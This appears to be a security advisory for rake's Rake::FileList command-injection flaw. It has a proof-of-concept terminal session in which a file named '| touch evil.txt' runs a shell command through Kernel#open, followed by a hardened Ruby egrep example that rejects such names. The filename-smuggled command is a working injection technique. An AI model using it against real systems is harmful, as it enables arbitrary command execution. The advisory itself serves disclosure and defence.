rake is a Make-like program implemented in Ruby.
Affected versions of this package are vulnerable to Arbitrary Code Injection in Rake::FileList when a filename that begins with the pipe character (|) is supplied: the name reaches Ruby's Kernel#open, which treats a leading | as a command to execute rather than a file to read.
PoC by Katsuhiko Yoshida
    % ls -1
    Gemfile
    Gemfile.lock
    poc_rake.rb
    vendor
    | touch evil.txt
    % bundle exec ruby poc_rake.rb
    ["poc_rake.rb", "Gemfile", "Gemfile.lock", "| touch evil.txt", "vendor"]
    poc_rake.rb:6:list.egrep(/something/)
    Error while processing 'vendor': Is a directory @ io_fillbuf - fd:7 vendor
    % ls -1
    Gemfile
    Gemfile.lock
    evil.txt
    poc_rake.rb
    vendor
    | touch evil.txt
Upgrade rake to version 12.3.3 or higher.
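The following is an added example, not rake's own code: an egrep-style scan over a list of filenames that shows the two defences against a pipe-prefixed entry such as the "| touch evil.txt" in the PoC above. It uses a plain Array instead of Rake::FileList so it runs without the rake gem, and the file names it creates are constructed samples.

```ruby
# Added example (not rake's code): hardened egrep over a list of paths.
require "tmpdir"

# Kernel#open would treat a name starting with "|" as a command to run.
# A real build file can never be a pipe, so refuse such names up front.
def pipe_name?(path)
  path.lstrip.start_with?("|")
end

# Scan regular files for lines matching +pattern+. Returns matches plus the
# entries that were refused or skipped. File.open (unlike Kernel#open) never
# spawns a subprocess, so even a name it does receive is opened as a literal
# path; the pipe_name? check on top is defence in depth and gives a report.
def safe_egrep(files, pattern)
  result = { matches: [], rejected: [], skipped: [] }
  files.each do |fn|
    if pipe_name?(fn)
      result[:rejected] << fn
      next
    end
    unless File.file?(fn)
      result[:skipped] << fn # directories such as "vendor"
      next
    end
    File.open(fn, "rb") do |io|
      io.each_line.with_index(1) do |line, n|
        result[:matches] << [fn, n, line.chomp] if line =~ pattern
      end
    end
  end
  result
end

# Reproduces the PoC layout in a throwaway directory, including a file whose
# literal name is "| touch evil.txt", then records whether evil.txt appeared.
def demo
  Dir.mktmpdir do |dir|
    Dir.chdir(dir) do
      File.write("poc_rake.rb", "list.egrep(/something/)\n")
      File.write("| touch evil.txt", "nothing to see here\n")
      Dir.mkdir("vendor")
      res = safe_egrep(["poc_rake.rb", "| touch evil.txt", "vendor"], /something/)
      res[:evil_created] = File.exist?("evil.txt")
      res
    end
  end
end
```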